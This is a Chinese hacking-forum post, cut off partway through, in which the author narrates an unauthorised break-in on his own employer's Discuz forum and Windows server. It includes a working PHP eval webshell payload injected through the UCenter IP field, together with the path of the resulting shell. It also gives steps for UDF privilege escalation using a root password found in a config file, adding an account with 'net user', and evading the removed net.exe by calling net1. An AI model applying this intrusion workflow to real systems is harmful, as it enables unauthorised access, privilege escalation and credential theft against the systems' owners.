对公司服务器的一次渗透.doc

小菜又来了，上次发了一个无意间发现的小漏洞急急忙忙的写了一下利用方法就发上来了，管理说没有分析什么的，我也不是码农怎么会分析呢？没办法不给通过就不能再90sec混刚刚好这几天渗透了一下公司的主站以及服务器。把渗透的过程发一下。下面是马赛克，毕竟公司的不好让你们破坏，进服务器的时候俺的心惊肉跳的。目录：1.巧社论坛创始人密码2.UC配置拿取shell3.初探权限及提权4.无NET提权5.PHP注册表查看3389端口6.mimikatz一键抓取明文-------------------------------------------------------------------------开始。1.巧社论坛创始人密码公司的论坛以及网站我当然熟悉不过了，公司是做CMS的做了将近一年也掌握了点公司的0day 不过不会公布的。公司的一个cms的0day可以进后台拿不到shell很蛋疼啊。什么web.config这些都可以搞到就是在后台拿不到shell后来没办法，想了想既然自己的CMS拿不到shell不如尝试一下论坛之类的。确实公司服务器上面有两个论坛一个DX2.5 一个 DZ 7.2小弟没有0day秒不掉，无意间发现DX2.5有很多垃圾广告，因为那个是给CMS演示UC整合的。所以可能他们没有管，我就想了想，有那么多广告对公司也不好啊。不如看看可以拿取到创始人账号密码不 原先好几千条垃圾广告，注册会员上W。被我清理了。然后中午吃饭，小弟就提起说我们那个演示论坛很多垃圾广告 然后老板很爽快的说，这件事吃饭回去之后你半小时把那些全部删除以及处理我说哦了。果断吃饭完老板发来账号密码貌似还是创始人的。 2.UC配置拿取shell在UCip地址里面填写 经过处理的一句话如下Madman\\);eval($_POST[a])?;// QQ然后保存 连接地址：90sec.org/config/config_ucenter.php 很简单的拿到webshell 3.初探权限及提权既然拿到shell 我们就会上大马看看权限什么的。果断上老衲的大马，呵呵没那么简单，不管上什么asp版的马都访问不了。完全不了解情况。小马 大马 以及啊D的asp版的扫描目录的也访问不了。这点很疑惑。到后面俺终于知道为什么呢，后面告诉你们 然后没办法先用菜刀访问一些自己了解的目录不访问不知道，一访问吓一跳，当初进公司没几天就知道两个老板都是玩黑客起家的谁知道目录权限那么差 这权限神级的设置的。估计只有helen设置的出来吧。哈哈拿既然权限那么大，而且还支持aspx就上aspx看看 有权限执行，先看看权限是什么。 哎，不是系统权限，以为这个傻X老板会给system不行啊，找了找第三方软件也没找到什么好的，后面找到一个root就在bbs里面 强大的老板root怎么可以放在config里面呢？哎 佩服。 这密码，我惊呆了，你密码搞的那么好，权限什么的都不设置有鸟用有了root上PHP大马或者UDF提权马就上暗月JJ的UDF提权马 填写上信息连接上 这版本UDF提权绝对无鸭梨 啊。不过想简单了，当我执行cmdshell的时候net组建没了。 然后马上下班 了，就没看了，下次不忙了在看，晚上也不能看，电脑被条子查了。哈哈4.无NET提权在昨天突然又想起来这个网站，然后就再次把我的一句话连接上，上UDF马，前面的马我全部清除了，以免被发现。他们经常上服务器。然后又上马儿，感觉还是不行突然，基友暗月JJ找我不知道什么事，这个工具他修改的，刚刚好问问他什么情况上了UDF马再次导DLL说不行郁闷了 暗月妹妹说是因为有了这个DLL，我说那直接执行OK吗？然后我就执行还是不行，在这里特别感谢暗月妹妹的指导。谢谢他让我看看你进程有什么防御软件不，这个看过了，貌似360还有什么主动防御好吧 然后他又叫我试一下net user lx 123456 /ad 果断这个在我原先就试过了。不过为了满足他还试一下还是不行、叫我whoami看看。好吧就按照他的做。aspx马上是 普通权限UDF上面是 system权限 权限看完，他叫我去读hash，小菜蛋疼 啊，读hash管理不在线怎么读。然后经过一段开导。月妹妹叫我试一下 net1哎呀果断奇迹出现。net1老板没有删除。好吧。net1秒杀一切下面提权无压力5.PHP注册表查看3389端口然后用户加